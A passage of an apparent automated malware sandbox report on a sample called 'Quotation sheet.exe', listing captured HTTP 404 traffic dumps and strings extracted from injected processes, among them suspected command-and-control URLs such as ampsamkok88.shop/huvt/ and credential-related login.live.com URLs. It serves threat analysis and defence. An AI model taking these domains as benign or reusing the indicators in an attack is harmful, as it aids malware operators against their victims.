href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 10:19:27 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61h0aBsMpLZYAVuIixgC6c2tasiU6xi%2BvgtBLdr6%2B%2BUusJuRQKeXdLuLTrP%2BzkYL165pdaj7bPLj9vQy6NCSU4qWbg94PaboI9o5XhoJwzMHxE2KxPPndSgzni2i2I%2B1JNfN%2FML3lA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e8923e769fa41a6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=621&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 93 2e 74 6d fd 03 ba 24 65 85 24 2d 5b ca 28 63 14 59 3a db 0a 8e e4 49 4a 32 2f f1 ff 3e 6c a7 69 56 68 c7 3e 18 24 dd 7b f7 ee 4e cf f2 8f 86 77 83 d9 e3 fd 08 7d 9e 4d c6 e8 fe e1 d3 f8 76 80 da a7 ae 7b 3b 9a dd b8 ee 70 36 6c 22 67 4e d7 75 47 d3 76 d8 f2 53 b3 c8 42 3f 05 c2 c2 96 6f b8 c9 20 ec 77 fb 68 2a 0d ba 91 4b c1 7c b7 39 6c f9 6e 0d f2 23 c9 8a 8a d7 0b 0f 30 69 2f 6c f9 79 38 4b 01 29 f8 b9 04 6d 80 a1 87 2f 63 b4 26 1a 09 69 50 5c e1 90 14 c8 a4 5c 23 0d 6a 05 ca f1 dd bc a6 5d 33 c6 0d 97 82 64 59 d1 41 04 fd 55 40 0b 94 92 aa 4e 04 82 ca a5 30 a0 80 a1 75 ca 33 40 46 15 5c 24 c8 48 b4 d4 80 88 40 a3 0a 3c 94 74 b9 00 61 aa f3 94 08 56 01 5f 2a db c9 6a aa 78 6e 42 2b 5e 0a 5a 89 5b f6 e6 79 89 a8 65 6f 56 44 a1 28 20 0e 95 c2 80 30 cf 39 b7 db fd d1 37 2e 98 5c 3b 6c 17 f1 78 6c 45 0d 8f 05 91 43 15 10 03 a3 0c aa 98 85 1b 39 6c 7b cc e1 42 80 aa ee 21 68 af 9b 14 4f 4f 83 9b 63 ba 3a ce 89 22 0b 1d 6c d4 15 be 80 8b cb b3 0f f0 f1 fc 32 26 fd 1e 39 c7 1d 73 85 27 33 fa 7b 32 7f fc 35 9d 4f ce a6 45 7f 3d 19 5e 57 5f 80 4b af 92 25 c1 73 2d 6f aa 13 47 48 41 21 c0 d8 23 8e 56 34 c0 2e 65 e2 94 26 dc a5 29 c9 32 10 09 9c e6 19 31 b1 54 0b b7 a1 69 77 ae 99 bb 20 5c 38 Data Ascii: 2a9Tk0B!.tm$e$-[(cY:IJ2/>liVh>${Nw}Mv{;p6l"gNuGvSB?o wh*K|9ln#0i/ly8K)m/c&iP\\#j]3dYAU@N0u3@F\$H@<taV_*jxnB+^Z[yeoVD( 097.\;lxlEC9l{B!hOOc:"l2&9s'3{25OE=^W_K%s-oGHA!#V4.e&)21Tiw \8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 10:19:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNEGVMKrSuD3fie%2FWG29BZDGVkstMMYqum5eXlzYxUazZO6cIEmE6wtQExqAoOsxJ1%2B068vXVKQ4bj6vH5hMbf6Z29ozvIFtZj%2Bc0Umm00BC%2BZsu7vZDqv%2B0D%2Bq%2BfCjdLW2OOVi3FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e8923f88ce5c35b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1463&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=645&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 6b 6b db 30 14 fd 9e 5f a1 86 52 c9 90 da e9 0b b2 fa 01 6d 92 b2 42 92 96 2d 65 94 31 8a 2c 5d db 2a 8e e4 49 4a b2 2c f1 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee 39 f7 dc 7b 75 ac e0 60 70 d7 9f 3e de 0f d1 e7 e9 78 84 ee 1f ae 47 b7 7d d4 3e f6 bc db e1 f4 c6 f3 06 d3 41 13 39 75 bb 9e 37 9c b4 a3 56 90 d9 59 1e 05 19 50 1e b5 02 2b 6c 0e d1 79 f7 1c 4d 94 45 37 6a 2e 79 e0 35 87 ad c0 ab 41 41 ac f8 aa e2 9d 44 7b 98 ec 24 6a 05 45 34 cd 00 69 f8 39 07 63 81 a3 87 2f 23 b4 a4 06 49 65 51 52 e1 90 92 c8 66 c2 20 03 7a 01 da 0d bc a2 a6 5d 71 2e ac 50 92 e6 f9 aa 83 28 fa ab 80 16 68 ad 74 9d 08 24 53 73 69 41 03 47 cb 4c e4 80 ac 5e 09 99 22 ab d0 dc 00 a2 12 0d 2b f0 40 b1 f9 0c a4 ad ce 33 2a 79 05 7c ad 6c 2b 6b 98 16 85 8d 48 32 97 ac 12 27 ce fa 65 89 18 71 d6 0b aa 51 1c 52 97 29 69 41 da 97 9c 9b cd ee e8 9b 90 5c 2d 5d be 8d f8 22 21 71 c3 e3 61 ec 32 0d d4 c2 30 87 2a 46 70 23 87 1d 9f bb 42 4a d0 d5 3d 84 ed 65 93 e2 e9 a9 7f 73 c8 16 87 05 d5 74 66 c2 b5 be c4 3d e8 7d 3a 3d 4b 7a 3d 06 17 ec ec 22 c6 1d 7b 89 c7 53 f6 7b fc fc f8 6b f2 3c 3e 1b f7 cf 97 e3 c1 55 f5 85 b8 f4 2b 59 1a be d4 f2 ae 3a 75 a5 92 0c 42 8c 7d ea 1a cd 42 ec 31 2e 8f 59 2a 3c 96 d1 3c 07 99 c2 71 91 53 9b 28 3d f3 1a 9a f1 9e 0d f7 66 54 Data Ascii: 2b3Tkk0_RmB-e1,]*IJ,4+c9{u`p>xG}>A9u7VYP+lyME7j.y5AAD{$jE4i9c/#IeQRf z]q.P(ht$SsiAGL^"+@3*y|l+kH2'eqQR)iA\-]"!qa20*Fp#BJ=estf=}:=Kz="{S{k<>U+Y:uB}B1.Y*<<qS(=fT
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 10:19:32 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNR13V4sLxlgAsW4Ga94sQ9gboILyfdeBIavtEmj3d7iZAdtW6u%2Fiay6xavXVPQ4csbmA6VHFXSPBnrqACkHL6yJR7VvJwMIWNiwYz4Pe7hz6psM1gi%2FjNtDJ9rLOVm3dNqWhf%2FstA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e892408f95f8cc0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1897&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1658&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0b a5 b2 21 b5 d3 2e 83 b6 fe 01 6d 92 b2 42 92 96 2d 65 94 31 8a 2c 9d 6d 05 45 f2 24 25 59 96 f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 85 1f 06 77 fd e9 e3 fd 10 7d 9e 8e 47 e8 fe e1 7a 74 db 47 ed 13 df bf 1d 4e 6f 7c 7f 30 1d 34 91 33 af eb fb c3 49 3b 6e 85 b9 9d 8b 38 cc 81 b0 b8 15 5a 6e 05 c4 bd 6e 0f 4d 94 45 37 6a 21 59 e8 37 87 ad d0 af 41 61 a2 d8 ba e2 9d c6 07 98 fc 34 6e 85 45 3c cd 01 69 f8 b9 00 63 81 a1 87 2f 23 b4 22 06 49 65 51 5a e1 90 92 c8 e6 dc 20 03 7a 09 da 0b fd a2 a6 5d 31 c6 2d 57 92 08 b1 ee 20 82 fe 2a a0 05 5a 2b 5d 27 02 49 d5 42 5a d0 c0 d0 2a e7 02 90 d5 6b 2e 33 64 15 5a 18 40 44 a2 61 05 1e 28 ba 98 83 b4 d5 79 4e 24 ab 80 2f 95 ed 64 0d d5 bc b0 b1 93 2e 24 ad c4 1d 77 f3 bc 44 d4 71 37 4b a2 51 12 11 8f 2a 69 41 da e7 9c db ed fe e8 1b 97 4c ad 3c b6 8b 04 3c 75 92 86 c7 a2 c4 a3 1a 88 85 a1 80 2a e6 e0 46 0e bb 01 f3 b8 94 a0 ab 7b 88 da ab 26 c5 d3 53 ff e6 88 2e 8f 0a a2 c9 dc 44 1b 7d 89 cf e1 fc e2 ac d7 3d 4f 2f 3e a5 e7 94 76 71 c7 5e e2 f1 94 fe 1e cf 1e 7f 4d 66 e3 8f 63 de 5b 8d 07 57 d5 17 e1 32 a8 64 49 f4 5c cb 9b ea c4 93 4a 52 88 30 0e 88 67 34 8d b0 4f 99 3c a1 19 f7 69 4e 84 00 99 c1 49 21 88 4d 95 9e fb 0d cd f8 33 c3 fc 39 e1 d2 9b 19 1c ec 35 32 Data Ascii: 2b3Tk0B!.mB-e1,mE$%Y4+c{wgw}GztGNo|043I;n8ZnnME7j!Y7Aa4nE<ic/#"IeQZ z]1-W *Z+]'IBZ*k.3dZ@Da(yN$/d.$wDq7KQ*iAL<<u*F{&S.D}=O/>vq^Mfc[W2dI\JR0g4O<iNI!M3952
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 10:19:35 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2alaFL6cxn9%2FkQLp6qGrmekdiGbdymeMHa10MsqovVrLhl%2FGz7ACuOGXYlXRBaaNCZczSM8YEhsrxuGGtFrkxhe%2FJWyb7fR0Ni0br0YaJ1%2FI%2Bdv3zw3ifPwMZFh4AGRgPt31HEsDZg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e8924195f8442b8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=365&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$param
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                      Source: Quotation sheet.exe, 00000000.00000002.2338419650.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHKO
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Matteicapital.online
                      Source: UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973090704.0000000002810000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ampsamkok88.shop
                      Source: UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973090704.0000000002810000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ampsamkok88.shop/huvt/
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikOF
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEh
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikO
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WE
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                      Source: UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?cO
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
